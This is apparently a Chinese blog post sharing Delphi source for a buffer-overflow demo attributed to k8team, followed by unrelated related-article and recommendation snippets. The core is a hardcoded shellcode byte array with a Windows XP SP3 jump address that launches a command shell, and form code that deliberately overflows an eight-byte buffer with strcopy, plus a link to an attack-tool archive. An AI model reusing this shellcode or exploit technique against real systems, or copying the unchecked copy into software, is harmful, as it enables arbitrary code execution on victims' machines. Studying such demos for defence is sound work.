[源码]Dephi溢出demo( Shellcode for XP)

unit Unit1;

interface

uses

  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

  Dialogs, StdCtrls;

type

  TForm1 = class(TForm)

    Edit1: TEdit;

    Button1: TButton;

    Button3: TButton;

    procedure Button2Click(Sender: TObject);

    procedure Button1Click(Sender: TObject);

    procedure Button3Click(Sender: TObject);

  private

    { Private declarations }

  public

    { Public declarations }

  end;

var

  Form1: TForm1;

 const

     ShellCodeSize = $00000079;  //16进制 -  121

//delphi overflow demo  by k8team

ShellCode : Array[0..ShellCodeSize-1] of byte =

(

//AAAA BBBB CCCC

$41,$41,$41,$41,$42,$42,$42,$42,$43,$43,$43,$43,   //115 73

$12,$45,$fa,$7f,  // xp sp3 跳转地址

//CMD ShellCode

$55,$8B,$EC,$33,$C0,$50,$50,$50,    //105  69

$C6,$45,$F4,$4D,$C6,$45,$F5,$53,

$C6,$45,$F6,$56,$C6,$45,$F7,$43,

$C6,$45,$F8,$52,$C6,$45,$F9,$54,

$C6,$45,$FA,$2E,$C6,$45,$FB,$44,

$C6,$45,$FC,$4C,$C6,$45,$FD,$4C,

$8D,$45,$F4,$50,$BA,$7B,$1D,$80,

$7C,$FF,$D2,$55,$8B,$EC,$83,$EC,

$2C,$B8,$63,$6F,$6D,$6D,$89,$45,

$F4,$B8,$61,$6E,$64,$2E,$89,$45,

$F8,$B8,$63,$6F,$6D,$22,$89,$45,

$FC,$33,$D2,$88,$55,$FF,$8D,$45,

$F4,$50,$B8,$C7,$93,$BF,$77,$FF,

$D0

);

implementation

{$R *.dfm}

procedure TForm1.Button1Click(Sender: TObject);

var k8test:pchar;

  procedure k8overflow(k8test:pchar);

  var test :array[0..7] of char;

  begin

    k8test:=pchar(edit1.text);

    strcopy(test,k8test);     //溢出

  end;

begin

  k8test:=pchar(edit1.text);

  k8overflow(k8test);

  application.MessageBox('没有溢出!','test');

end;

procedure TForm1.Button2Click(Sender: TObject);

begin

  application.MessageBox('溢出了!','test');

end;

procedure TForm1.Button3Click(Sender: TObject);

var k8test:pchar;

  procedure k8overflow(k8test:pchar);

  var test :array[0..7] of char;

  begin

     k8test:=@ShellCode;

     strcopy(test,k8test);  //溢出

  end;

begin

  k8test:=pchar(edit1.text);

  k8overflow(k8test);

  application.MessageBox('没有溢出!','test');

end;

end.

https://github.com/k8gege/K8tools/blob/master/Dephi%E6%BA%A2%E5%87%BAdemo%20by%20k8team_1103%5BK8%5D.rar

[源码]Dephi溢出demo( Shellcode for XP)的更多相关文章

  1. 看源码和写demo是一种比较容易提升的方式

    github就是要这么用才行.看别人的源码,就能了解到很多规范,而写demo,就是自己写出自己的代码.莫欺少年穷

  2. 基于wke封装的duilib的webkit浏览器控件,可以c++与js互交,源码及demo下载地址

    转载请说明原出处,谢谢~~ 前些日子用wke内核封装了duilib的webkit浏览器控件,好多群里朋友私聊我希望可以我公布源码,今天把这个控件的源码和使用demo公布.其实这个控件封装起来没什么难度 ...

  3. [c#]asp.net开发微信公众平台(7)前6篇的整体框架demo源码

    这里给出的demo是具备整体框架的微信公众平台源码, 所谓demo就是拿过去就可以直接演示使用的东西,  当然不会具备非常详细的具体到业务层面.数据层面的东西, 每个人都可以在此基础上自由发挥,  只 ...

  4. Spring源码学习:第1步--在Spring源码中添加最简单的Demo代码

    为了最大程度地贴近Spring源码并进行学习,一种比较直接的做法是:直接在Spring源码中加入Demo代码,并进行调试. 参照以前使用Spring的经验,Spring最简单的使用方法是:一个实体类. ...

  5. [转]Asp.Net大型项目实践(11)-基于MVC Action粒度的权限管理【续】【源码在这里】(在线demo,全部源码)

    本文转自:http://www.cnblogs.com/legendxian/archive/2010/01/25/1655551.html 接上篇Asp.Net大型项目实践(10)-基于MVC Ac ...

  6. Entity Framework在Asp.net MVC中的实现One Context Per Request(附源码)

    上篇中"Entity Framework中的Identity map和Unit of Work模式", 由于EF中的Identity map和Unit of Work模式,EF体现 ...

  7. [AYUI]QQ管家源码已经开源

    (0-50元 黑色字体     享受AY 1周的 ayui 技术问答) (50-100元 绿色字体 享受AY 15天的 ayui 技术问答) (100-150元 蓝色字体 享受AY 20天的 ayui ...

  8. 语音分享应用ios源码

    该源码是语音分享应用源码,本demo使用了科大讯飞语音识别作为分享内容的输入方式,同时也支持手动键盘输入分享内容,限制分享内容文字不能超过180个字符,分享内容输入完成后可以直接分享,分享SDK使用的 ...

  9. C#源码大汇总

    C#高仿QQ2013可在广域网部署聊天系统GG叽叽 动态显示硬盘分区容量饼图 自定义ProgressBar控件高仿Win8进度条 多皮肤精美在线QQ悬浮客服插件 jQuery仿天猫首页多格焦点图片轮播 ...

随机推荐

  1. kubernetes 基础

    官网 kubernetes.io 有中文 中文网站  http://docs.kubernetes.org.cn kubectl 详细情况 https://kubernetes.io/docs/ref ...

  2. 249. Group Shifted Strings把迁移后相同的字符串集合起来

    [抄题]: Given a string, we can "shift" each of its letter to its successive letter, for exam ...

  3. [leetcode]52. N-Queens II N皇后

    The n-queens puzzle is the problem of placing n queens on an n×n chessboard such that no two queens ...

  4. tomcat7闪退

    问题是我昨天运行的好好的,今天加了些代码,tomcat7就会启动闪退.我把conf/server.xml中的<Context />去掉,tomcat又能正常启动! 那么问题出在哪里呢? 我 ...

  5. APIView流程——请求方式分发

  6. Django model进阶

    Django-model进阶   QuerySet 可切片 使用Python 的切片语法来限制查询集记录的数目 .它等同于SQL 的LIMIT 和OFFSET 子句. >>> Ent ...

  7. ubuntu,day 2 ,退出当前用户,创建用户,查找,su,sudo,管道符,grep,alias,mount,tar解压

    本节内容: 1,文件权限的控制,chmod,chown 2,用户的增删和所属组,useradd,userdel 3,用户组的增删,groupadd,groupdel 4,su,sudo的介绍 5,别名 ...

  8. Chapter3_操作符_关系操作符

    java中的关系操作符有等于“=”,不等于“!=”,大于“>”,小于“<”,大于等于“≥”,小于等于“≤”等.这些都不再赘述了,有一个有意思的点是关于等价性的讨论. 在java中测试两个对 ...

  9. 【Selenium】【BugList2】geckodriver未安装,报:WebDriverException: Message: 'geckodriver' executable needs to be in PATH.

    环境信息:Windows7 64位 + python 3.6.5 + selenium 3.11.0 +pyCharm #coding=utf-8 from selenium import webdr ...

  10. python模块:configparser

    """Configuration file parser. A configuration file consists of sections, lead by a &q ...